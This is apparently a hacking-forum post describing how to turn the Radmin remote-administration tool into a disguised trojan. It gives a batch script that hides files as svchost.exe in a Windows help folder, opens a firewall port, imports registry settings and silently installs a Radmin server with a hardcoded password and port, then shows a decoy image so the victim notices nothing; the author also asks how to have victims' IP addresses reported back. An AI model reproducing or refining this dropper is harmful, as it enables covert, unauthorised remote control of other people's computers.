Hello ,
This is some tweak for Radmin i make myself
1.Get Radmin files from this post
2.Get compiler
3.Compilee Radmin files with needed files
4.Add some icon and invisibility for .exe
What's happen when you run the compiled .exe
Код:
mkdir %SYSTEMROOT%\help\Tours\nnTour
copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe"
copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/help/Tours/nnTour/raddrv.dll"
copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/help/Tours/nnTour/AdmDll.dll"
copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/help/Tours/nnTour/111.bat"
copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/help/Tours/nnTour/111.reg"
netsh firewall add portopening protocol = TCP port = 53221 name = TCP
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg
regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg
"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence
"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /start
"%MYFILES%\1.jpg"
1. Make folder %SYSTEMROOT%\help\Tours\nnTour
2.Copy all needed files in %SYSTEMROOT%\help\Tours\nnTour
3.Open MS firewall with name "TCP" and port "53221"
netsh firewall add portopening protocol = TCP port = 32554 name = TCP
4.Import needed registry
5.Install radmin save everything use silence for icon and pass r1st0n and port 53221
- "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
- Start Radmin server
6.Open 1.jpg
When user run the exe at end after 1-2 sec.s he see the 1.jpg
You can make some tweeks to delete the reg and .bat files after install
With quick.batch.file.compiler you can import little files this was perfect to import :
svchost.exe ,raddrv.dll,AdmDll.dll,111.bat,111.reg,
Next thing is if someone can help is how to import some script or report how will give me the victim IP address for example if someone download it from HTTP and run it how to see the victim IP if someone can help I will be glad
Greetings
RADMIN FILES